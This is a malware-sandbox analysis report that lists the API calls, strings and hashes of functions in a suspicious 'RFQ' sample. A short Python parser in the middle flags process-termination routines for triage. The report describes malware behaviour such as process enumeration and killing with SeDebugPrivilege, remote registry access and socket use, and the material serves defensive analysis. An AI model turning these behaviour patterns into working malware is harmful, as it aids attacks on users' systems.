• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007CDC00), ref: 0078B749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0078B8C1
• SysFreeString.OLEAUT32(?), ref: 0078B8EB
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: da56426c273c18bb52322d7756eeb249e2eaaf07abf578dac9fed677c734666d
• Instruction ID: 6a8b78bebf7714c04238967e9f7cf9565ce43a3d1b2c96c5423fa5b7e1ed2f0b
• Opcode Fuzzy Hash: da56426c273c18bb52322d7756eeb249e2eaaf07abf578dac9fed677c734666d
• Instruction Fuzzy Hash: 90F16E75A00209EFCF14EFA4C888EAEB7B9FF48315F108459F905AB251DB35AE45CB90
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 007924F5
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00792688
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007926AC
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007926EC
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079270E
                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0079286F
                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007928A1
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 007928D0
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00792947
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0079B3F4
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007ADB1B
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007ADB3C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007ADB51
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007ADB6E
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007ADB95
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,0074A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 007ADBA0
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007ADBBD
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,0074A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 007ADBC8
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
APIs
  • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00775FA6,?), ref: 00776ED8
  • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00775FA6,?), ref: 00776EF1
  • Part of subcall function 007772CB: GetFileAttributesW.KERNEL32(?,00776019), ref: 007772CC
• lstrcmpiW.KERNEL32(?,?), ref: 007775CA
• _wcscmp.LIBCMT ref: 007775E2
• MoveFileW.KERNEL32(?,?), ref: 007775FB
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007ADAD1,00000004,00000000,00000000), ref: 0074EAEB
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,007ADAD1,00000004,00000000,00000000), ref: 0074EB32
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,007ADAD1,00000004,00000000,00000000), ref: 007ADC86
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007ADAD1,00000004,00000000,00000000), ref: 007ADCF2
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0076AEF1,00000B00,?,?), ref: 0076B26C
• HeapAlloc.KERNEL32(00000000,?,0076AEF1,00000B00,?,?), ref: 0076B273
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0076AEF1,00000B00,?,?), ref: 0076B288
• GetCurrentProcess.KERNEL32(?,00000000,?,0076AEF1,00000B00,?,?), ref: 0076B290
• DuplicateHandle.KERNEL32(00000000,?,0076AEF1,00000B00,?,?), ref: 0076B293
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0076AEF1,00000B00,?,?), ref: 0076B2A3
• GetCurrentProcess.KERNEL32(0076AEF1,00000000,?,0076AEF1,00000B00,?,?), ref: 0076B2AB
• DuplicateHandle.KERNEL32(00000000,?,0076AEF1,00000B00,?,?), ref: 0076B2AE
• CreateThread.KERNEL32(00000000,00000000,0076B2D4,00000000,00000000,00000000), ref: 0076B2C8
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                      • Part of subcall function 0074C6F4: _wcscpy.LIBCMT ref: 0074C717
                                                                                                                                                    • _wcstok.LIBCMT ref: 0078184E
                                                                                                                                                    • _wcscpy.LIBCMT ref: 007818DD
                                                                                                                                                    • _memset.LIBCMT ref: 00781910
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                    • String ID: X$p2~l2~
                                                                                                                                                    • API String ID: 774024439-2553291027
                                                                                                                                                    • Opcode ID: b6b1cd87dcbd73d175b008c713706ff067a9e9ce8bc4fcd194a6b97d113951cf
                                                                                                                                                    • Instruction ID: 4676cc9426c8c7c4419c95abc65c58a85e8f4d33f92215a446fb5fce788134d2
                                                                                                                                                    • Opcode Fuzzy Hash: b6b1cd87dcbd73d175b008c713706ff067a9e9ce8bc4fcd194a6b97d113951cf
                                                                                                                                                    • Instruction Fuzzy Hash: C3C17171504340DFD724EF24C889A9AB7E4BF85350F40892DF999972A2DB78ED45CB82
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: Q\E$[$\$\$]$^
                                                                                                                                                    • API String ID: 2102423945-1026548749
                                                                                                                                                    • Opcode ID: baf6e6eaa100a409e8302963b0e40be5c3ce9ceb5cbaaec8a8be08f778b5148f
                                                                                                                                                    • Instruction ID: 27cba29e4d223d9c19d1017c3494c01dc13bc711e622b204e0c29ca7e679a0fc
                                                                                                                                                    • Opcode Fuzzy Hash: baf6e6eaa100a409e8302963b0e40be5c3ce9ceb5cbaaec8a8be08f778b5148f
                                                                                                                                                    • Instruction Fuzzy Hash: B9517471D00209DBDF74CFD8C8816ADB7B2BF95314F248266D814A7252D7389D85CB51
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00799B19
                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00799B2D
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00799B47
                                                                                                                                                    • _wcscat.LIBCMT ref: 00799BA2
                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00799BB9
                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00799BE7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                                                    • Opcode ID: 628e9c1e075b0aac0f08cbdaf48e12a8726c1c5616b49f321382aa1b036fa02d
                                                                                                                                                    • Instruction ID: 80ee38664bb079e760f880f8d2abe50b4784f7bb1fdca10b25a5447dd575fc32
                                                                                                                                                    • Opcode Fuzzy Hash: 628e9c1e075b0aac0f08cbdaf48e12a8726c1c5616b49f321382aa1b036fa02d
                                                                                                                                                    • Instruction Fuzzy Hash: 1A419371900348EBEF219F68DC85FEE77B8EF08350F10452AFA45A7291D6799D84CB64
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00776532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00776554
                                                                                                                                                      • Part of subcall function 00776532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00776564
                                                                                                                                                      • Part of subcall function 00776532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007765F9
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079179A
                                                                                                                                                    • GetLastError.KERNEL32 ref: 007917AD
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007917D9
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00791855
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00791860
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00791895
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                    • Opcode ID: 77b2ae6cdd9e5fe20abd9ed0c95ce8fcb1a009f927b11bcd28d29dd2860bccad
                                                                                                                                                    • Instruction ID: 5f72b915fb25c291b93634ff9aaa03caf284df51ad61282b1ab4ecec50e0a466
                                                                                                                                                    • Opcode Fuzzy Hash: 77b2ae6cdd9e5fe20abd9ed0c95ce8fcb1a009f927b11bcd28d29dd2860bccad
                                                                                                                                                    • Instruction Fuzzy Hash: 0641AC72600206EFDF15EF54D8A9F6DB7A1AF08310F45C058F9069F2C2DBBCA9108B61
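The function block above (Toolhelp32 process enumeration in a subcall, then OpenProcess with access mask 00000001, TerminateProcess, and the string SeDebugPrivilege) is the kind of entry an analyst wants to pull out of a report this long automatically. The following parser is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It reads function blocks in exactly the layout used in this section (an "APIs" heading, bullet lines of the form `Name.MODULE(args), ref: address`, nested "Part of subcall function" lines, and the "Similarity" key/value bullets) and applies a triage heuristic for process-kill routines. The sample input is constructed from two of the blocks on this page (the process-termination block and the LoadIconW block). The only external fact used is the Win32 constant PROCESS_TERMINATE = 0x0001, which is what the access mask 00000001 passed to OpenProcess denotes; the heuristic itself (which combination of calls and strings is worth flagging) is the editor's assumption for triage, not a verdict stated by the report.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: two function blocks copied in the report's own layout
# (the process-termination block and the LoadIconW block from this section).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00776532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00776554
  • Part of subcall function 00776532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00776564
  • Part of subcall function 00776532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007765F9
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079179A
• GetLastError.KERNEL32 ref: 007917AD
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 007917D9
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00791855
• GetLastError.KERNEL32(00000000), ref: 00791860
• CloseHandle.KERNEL32(00000000), ref: 00791895
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: 77b2ae6cdd9e5fe20abd9ed0c95ce8fcb1a009f927b11bcd28d29dd2860bccad
• Instruction ID: 5f72b915fb25c291b93634ff9aaa03caf284df51ad61282b1ab4ecec50e0a466
• Opcode Fuzzy Hash: 77b2ae6cdd9e5fe20abd9ed0c95ce8fcb1a009f927b11bcd28d29dd2860bccad
• Instruction Fuzzy Hash: 0641AC72600206EFDF15EF54D8A9F6DB7A1AF08310F45C058F9069F2C2DBBCA9108B61
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 007758B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: 67064a35d8fca9e660c1e1548a589b91a34614b52709be390d15f1ef6cca91ed
• Instruction ID: 0cd981f7168ff2e3331f98e21e3d7b230507305126cc5286c73afe960a456eca
• Opcode Fuzzy Hash: 67064a35d8fca9e660c1e1548a589b91a34614b52709be390d15f1ef6cca91ed
• Instruction Fuzzy Hash: DB110D71209742FBEF115B659C86EAA339C9F19350B20403AF904E62C1EBECAA1042A6
"""

# One API bullet: optional "Part of subcall function XXXXXXXX: " prefix,
# Name.MODULE, optional (args), optional comma, then "ref: address".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})\s*$"
)
# A "Key: value" bullet from the Similarity / Memory Dump Source sections.
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")

PROCESS_TERMINATE = 0x0001  # Win32 dwDesiredAccess bit for OpenProcess


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    via_subcall: Optional[str] = None  # address of the subcall function, if indirect


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    @property
    def strings(self) -> List[str]:
        # The report joins referenced strings with "$" in the "String ID" field.
        return [s for s in self.meta.get("String ID", "").split("$") if s]

    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.apis if c.via_subcall is None]


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split report text into function blocks, one per 'APIs' heading."""
    blocks: List[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.meta[m["key"].strip()] = m["value"].strip()
    return blocks


def flag_process_kill(block: FunctionBlock) -> List[str]:
    """Triage heuristic (editor's assumption): reasons this block looks like a process-kill routine."""
    reasons = []
    direct = block.direct_calls()
    # OpenProcess with a concrete first argument whose PROCESS_TERMINATE bit is set.
    if any(c.name == "OpenProcess" and c.args and c.args[0] != "?"
           and int(c.args[0], 16) & PROCESS_TERMINATE for c in direct):
        reasons.append("OpenProcess requests PROCESS_TERMINATE")
    if any(c.name == "TerminateProcess" for c in direct):
        reasons.append("calls TerminateProcess")
    if any(c.name == "CreateToolhelp32Snapshot" for c in block.apis):
        reasons.append("enumerates processes via Toolhelp32")
    if "SeDebugPrivilege" in block.strings:
        reasons.append("references SeDebugPrivilege")
    return reasons


def triage(text: str) -> List[Tuple[str, List[str]]]:
    """Return (Instruction Fuzzy Hash, reasons) for every flagged block."""
    out = []
    for b in parse_blocks(text):
        reasons = flag_process_kill(b)
        if reasons:
            out.append((b.meta.get("Instruction Fuzzy Hash", "?"), reasons))
    return out


if __name__ == "__main__":
    for fuzzy, reasons in triage(SAMPLE_REPORT):
        print(fuzzy, "->", "; ".join(reasons))
```

The Instruction Fuzzy Hash is carried through as the key because that is the field that survives recompilation of the same AutoIt routine better than the exact Opcode ID, so flagged hashes can be compared across reports of related samples. Calls reached only through "Part of subcall function" lines are kept but marked, since the report attributes them to a callee rather than to the function being described.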
                                                                                                                                                    APIs
                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 007758B8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                                    • Opcode ID: 67064a35d8fca9e660c1e1548a589b91a34614b52709be390d15f1ef6cca91ed
                                                                                                                                                    • Instruction ID: 0cd981f7168ff2e3331f98e21e3d7b230507305126cc5286c73afe960a456eca
                                                                                                                                                    • Opcode Fuzzy Hash: 67064a35d8fca9e660c1e1548a589b91a34614b52709be390d15f1ef6cca91ed
                                                                                                                                                    • Instruction Fuzzy Hash: DB110D71209742FBEF115B659C86EAA339C9F19350B20403AF904E62C1EBECAA1042A6
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0077A806
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafeVartype
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1725837607-0
                                                                                                                                                    • Opcode ID: 50554411a9183ab837a5924df6e5278a74217302710fa9215cd69ccf04bec82b
                                                                                                                                                    • Instruction ID: b0f41bda6928265c51a760f3a9c8af8f15696a7d1df4cb475719b9080ab54d69
                                                                                                                                                    • Opcode Fuzzy Hash: 50554411a9183ab837a5924df6e5278a74217302710fa9215cd69ccf04bec82b
                                                                                                                                                    • Instruction Fuzzy Hash: B5C17B75A0521AEFEF14CF98C485BAEB7B4FF49351F20C069E609E7241D738A941CB92
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00776B63
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00776B6A
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00776B80
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00776B87
                                                                                                                                                    • _wprintf.LIBCMT ref: 00776BAD
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00776BCB
                                                                                                                                                    Strings
                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00776BA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                                                    • Opcode ID: 70f567a7cab9ef7b4e8fb9117b02d057db5a5ab60707d3861f32b73f637f7b09
                                                                                                                                                    • Instruction ID: 8bf899317b1dc809efd4988ec415421d2d67cd0dc9e55791726bf788fc18c2e8
                                                                                                                                                    • Opcode Fuzzy Hash: 70f567a7cab9ef7b4e8fb9117b02d057db5a5ab60707d3861f32b73f637f7b09
                                                                                                                                                    • Instruction Fuzzy Hash: 780136F690020CBFEB21A7A49D89FF7776CDB08345F0085A5B755D2051EA789E848F74
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00793C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00792BF6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharConnectRegistryUpper
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2595220575-0
                                                                                                                                                    • Opcode ID: 17efbaedcc4d651aeb6971561924ed9e47fd5852ead012cb455c24d3a390fc64
                                                                                                                                                    • Instruction ID: ee21ccc4562b9f80ec953b6e3607292afabce452e858af08e75a2cf5f5e52c6d
                                                                                                                                                    • Opcode Fuzzy Hash: 17efbaedcc4d651aeb6971561924ed9e47fd5852ead012cb455c24d3a390fc64
                                                                                                                                                    • Instruction Fuzzy Hash: E3916B71204201EFDB15EF14D895F6EB7E5AF48310F04881DF99697292DB38E906CB52
                                                                                                                                                    APIs
                                                                                                                                                    • select.WSOCK32 ref: 00789691
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0078969E
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 007896C8
                                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007896E9
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007896F8
                                                                                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 007897AA
                                                                                                                                                    • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,007CDC00), ref: 00789765
                                                                                                                                                      • Part of subcall function 0076D2FF: _strlen.LIBCMT ref: 0076D309
                                                                                                                                                    • _strlen.LIBCMT ref: 00789800
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
